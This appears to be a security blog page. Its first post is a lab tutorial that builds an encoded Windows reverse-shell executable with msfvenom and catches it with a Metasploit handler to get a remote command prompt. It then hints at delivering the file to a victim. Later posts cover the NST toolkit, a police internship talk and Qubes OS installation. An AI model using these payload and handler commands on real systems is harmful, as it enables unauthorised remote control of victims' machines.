Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step by step way to get shell or command terminal of a victim user on Windows 7 OS from an other PC with a loaded Kali OS.The setup scenario is like this as seen in the screen shots below in a virtual box environment :

KALI LINUX : IP Address eth1 : 192.168.1.7

 Windows 7 Ultimate Machine : IP Address : 192.168.1.8

 Pinging from Kali LInux Machine to Windows 7 Machine

 Pinging from Windows 7 to Kali Linux Machine

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.Now need to go to Kali terminal and execute the following command :

p /windows/meterpreter/reverse_tcp designates the payload we want to embed
LHOST designates the local host
LPORT designates the port we want to listen on
-x designates the template we want to use and the path to it
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
anupam.exe designates the name of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe

Click to Enlarge

Followed by the following sets of command :

root@kali:~# file /tmp/anupam.exe

root@kali:~# msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set payload windows/shell/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST 192.168.1.7

msf exploit(handler) > set LPORT 3333

msf exploit(handler) > exploit

 

Now you need to apply your skills to take the file ..anupam.exe in this case to the windows machine.In my case for example,i have placed it on the desktop as seen below :

The moment the file anupam.exe is clicked and executed from the windows machine,we get the shell on the Kali Linux machine as seen below :

Here you have the C:\ prompt from the windows machine :-)

Network Security Toolkit (NST)

The Network Security Toolkit is the brainchild of Paul Blankenbaker and Ron Henderson and is a Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional. The Network Security Toolkit (NST) is a Linux-based Live DVD/USB Flash Drive that provides a set of open source computer security and networking tools to perform routine security and networking diagnostic and monitoring tasks. The distribution can be used as a network security analysis, validation and monitoring tool on servers hosting virtual machines. The majority of tools published in the article "Top 125 security tools" by Insecure.org are available in the toolkit. NST has package management capabilities similar to Fedora and maintains its own repository of additional packages.he new version of NST was released June 5 and according to the NST Web site, this release includes:
 

• A Enterprise class patch management system for NST WUI updates and system file patches and updates.
   
• A new nstvmware script to facilitate the use of NST within a VMware virtual machine.
   
• The inclusion of the VMware Tools and modules to optimize the NST performance within a VMware virtual machine.
   
• Many new enhancements to the NST WUI database management pages for both the MySQL and PostgreSQL database servers.
   
• Replaced the NST WUI network protocol anaylzer capture engine: “tethereal” with the new light-weight “dumpcap” application which is part of the new “ethereal” v0.99.0 protocol analyzer suite.
   
• Many networking and security applications have been updated to their latest version.

Download Link :  https://sourceforge.net/projects/nst/files/latest/download?source=files

Size : 2.8 GB

The screen shots below show a run through while I installed the NST on a virtual box.

AS it completes the installation part below :

 

While you run the installed image for the first time,the interface will ask to create a basic user as below : 

Ready to go.....

Gurugram Police Summer Internship on Cyber Security 2016

A small mention about me made in this video link uploaded to give an overview brief of the Gurugram Police Summer Internship on Cyber Security 2016 conducted under aegis Rakshit Tandon.

Cyber Security Summer Internship 2016 Gurgaon Police : 10 Jun 2016

Today got an opportunity to speak at Cyber Security Summer Internship 2016 Gurgaon Police being conducted under the aegis of Shri Rakshit Tandon.Below is the presentation that I presented before the attending audience on Hardware Trojans.

   Hardware Trojans : Summer Internship Gurgaon Police- 10 Jun 2016 by Anupam Tiwari

Few Pics from the Internship meet are shared below :

Qubes OS Installation in VMWARE Workstation player

1.   Qubes OS is a security-focused desktop operating system that aims to provide security through isolation.Virtualization is performed by Xen, and user environments can be based on Fedora, Debian, Whonix, and Microsoft Windows, among other operating systems.In my earlier post here at http://anupriti.blogspot.in/2016/05/qubes-os-installation-issue-with.html,wherein I had shown the installation issue I faced in Virtual Box,here I put forth (a pretty longish installation though about 2 hours plus) a series of steps along with screenshots as I was able to install the Qubes OS in VMWARE Workstation player.

The only irritant thing is the installation time...it takes about 150 minutes to complete the entire installation.Rest any queries are welcome....